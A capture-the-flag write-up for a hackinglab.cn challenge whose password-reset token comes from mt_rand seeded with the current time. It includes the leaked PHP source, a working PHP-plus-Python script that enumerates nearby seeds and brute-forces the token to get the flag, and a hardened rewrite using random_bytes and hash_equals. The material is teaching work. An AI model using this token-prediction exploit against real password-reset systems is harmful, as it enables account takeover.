Xiao Ming learning code audit writeup
The challenge comes from the comprehensive category on hackinglab.cn.
Challenge address: http://lab1.xseclab.com/pentest6_210deacdf09c9fe184d16c8f7288164f/index.php
Visiting the challenge address returns the following source:
Please Reset Your Password Then Get your flag!
<a href="./resetpwd.php"></a>
Following the link to resetpwd.php and viewing the page source, the PHP code of the page is found inside an HTML comment:
<?php
session_start();
include '_flag.php';
date_default_timezone_set('Asia/Shanghai');
if(isset($_POST['token']) && isset($_SESSION['token']) && !empty($_POST['token']) && !empty($_SESSION['token'])){
    if($_POST['token']==$_SESSION['token']){
        echo "PassResetSuccess! Your Flag is:".$flag;
    }else{
        echo "Token_error!";
    }
}else{
    // the generator is seeded with the current second, so the token is a
    // function of the server clock rather than of unpredictable randomness
    mt_srand(time());
    $rand= mt_rand();
    $_SESSION['token']=sha1(md5($rand));
    echo "Token Generate Ok! now send email to your EmailBox!.....";
    if(sendmymail($_SESSION['token'])){
        echo "SendOK! \r\n<br> Your password reset Token has been send to your mailbox! <br>Please Check your mail box and fill your token here to reset your password!<br>";
    }
}
echo '<form action="" method="POST">
<input type="text" name="token">
<input type="submit" value="submit">
</form>';
// the script appends its own source as an HTML comment, which is how it was disclosed
echo "<!--\r\n".file_get_contents(__FILE__);
?>
Reading the source shows that the flag is only returned for the correct token. Requesting resetpwd.php without submitting a token regenerates the token; submitting a token (right or wrong) leaves it unchanged.
The token is generated from a random number as follows:
mt_srand(time());
$rand= mt_rand();
$_SESSION['token']=sha1(md5($rand));
mt_rand() is a deterministic generator: for the same mt_srand() seed it always produces the same sequence, so seeding with time() means the token is fixed by the second in which the request was made. Because the attacker's clock and the server's clock agree to within a few seconds, enumerating a small window of seeds around the current time is enough to recover the token, and the exploit can be written as follows:
Auxiliary script (ttt.php, run locally; it prints one candidate token per seed)
<?php
$base = time();
// use a window of seeds around the current time to make sure the server's second is hit
for($i = -5;$i <= 5;$i++)
{
    mt_srand($base+$i);
    $rand = mt_rand();
    echo sha1(md5($rand))."<br/>";
}
?>
EXP
import requests

# fetch the candidate tokens produced by the auxiliary PHP script
r = requests.get('http://localhost/ttt.php')
rlt = r.text.split('<br/>')
rlt = rlt[:-1]  # drop the empty element after the last <br/>
data = {}
header = {"Cookie":"PHPSESSID=294a9b966570ae34347a613e894d3271","Referer":"http://lab1.xseclab.com/pentest6_210deacdf09c9fe184d16c8f7288164f/index.php"}
url = 'http://lab1.xseclab.com/pentest6_210deacdf09c9fe184d16c8f7288164f/resetpwd.php'
# reset the token: a GET without a token regenerates it from the current time
r = requests.get(url,headers=header)
for i in rlt:
    data["token"] = i
    r = requests.post(url,data=data,headers=header)
    r.encoding = r.apparent_encoding
    if "Token_error!" not in r.text[:60]:
        print(r.text[:60])
Running the exploit returns the flag:
PassResetSuccess! Your Flag is:NotSecurityRandomNowYouKnown<
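As an added example (not part of the original writeup or challenge), the same reset flow rewritten so the token cannot be recomputed from the clock: random_bytes() replaces mt_srand(time()), the comparison uses hash_equals() instead of ==, and the token expires and is single-use. sendmymail() and _flag.php are assumed to exist as in the challenge; TOKEN_TTL is an assumed value.

```php
<?php
// Hardened variant of the challenge's resetpwd.php (added example, not the
// original code). Assumes the challenge's sendmymail() helper and _flag.php.
session_start();
include '_flag.php';

const TOKEN_TTL = 900; // seconds a reset token stays valid (assumed value)

function generate_reset_token(): string {
    // random_bytes() reads the OS CSPRNG; unlike mt_rand() seeded with time(),
    // the output cannot be reproduced by guessing the request's timestamp.
    return bin2hex(random_bytes(32));
}

function verify_reset_token(string $submitted, array &$session): bool {
    if (!isset($session['token'], $session['token_expires'])) {
        return false;
    }
    // An expiry bounds how long a leaked token remains usable.
    $expired = time() > $session['token_expires'];
    // hash_equals() is a strict, constant-time string comparison; it avoids
    // the loose-comparison behaviour of == on numeric-looking strings.
    $match = hash_equals($session['token'], $submitted);
    // Single use: discard the token after any attempt, so a wrong guess
    // cannot be followed by more guesses against the same token.
    unset($session['token'], $session['token_expires']);
    return $match && !$expired;
}

if (isset($_POST['token']) && is_string($_POST['token']) && $_POST['token'] !== '') {
    if (verify_reset_token($_POST['token'], $_SESSION)) {
        echo "PassResetSuccess! Your Flag is:" . $flag;
    } else {
        echo "Token_error!";
    }
} else {
    $_SESSION['token'] = generate_reset_token();
    $_SESSION['token_expires'] = time() + TOKEN_TTL;
    if (sendmymail($_SESSION['token'])) {
        echo "SendOK! Check your mailbox for the reset token.";
    }
}
// Note: the original also echoed its own source via file_get_contents(__FILE__);
// that line is deliberately omitted here.
```

With this change the seed-enumeration approach above no longer applies, since there is no seed to enumerate and a wrong submission invalidates the token.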